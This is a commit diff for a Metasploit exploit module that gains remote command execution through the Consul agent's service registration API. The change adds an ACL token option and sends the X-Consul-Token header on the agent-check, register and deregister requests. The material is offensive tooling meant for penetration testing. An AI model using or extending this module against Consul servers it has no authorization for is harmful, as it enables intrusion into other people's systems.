Add support for authorization with X-Consul-Token ACL header.

modules/exploits/multi/misc/consul_service_exec.rb

@@ -39,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'The base path', '/']),
         OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
+        OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
         Opt::RPORT(8500)
       ])
   end
@@ -49,6 +50,9 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'method'   => 'GET',
       'uri'      => normalize_uri(uri, "/v1/agent/self"),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
     })
     unless res
       vprint_error 'Connection failed'
@@ -78,6 +82,9 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'method' => 'PUT',
       'uri' => normalize_uri(uri, 'v1/agent/service/register'),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      },
       'ctype' => 'application/json',
       'data' => {
         :ID => "#{service_name}",
@@ -107,6 +114,9 @@ class MetasploitModule < Msf::Exploit::Remote
         uri,
         "v1/agent/service/deregister/#{service_name}"
       ),
+      'headers' => {
+        'X-Consul-Token' => datastore['ACL_TOKEN']
+      }
     })
     if res and not res.code == 200
       fail_with(Failure::Unknown,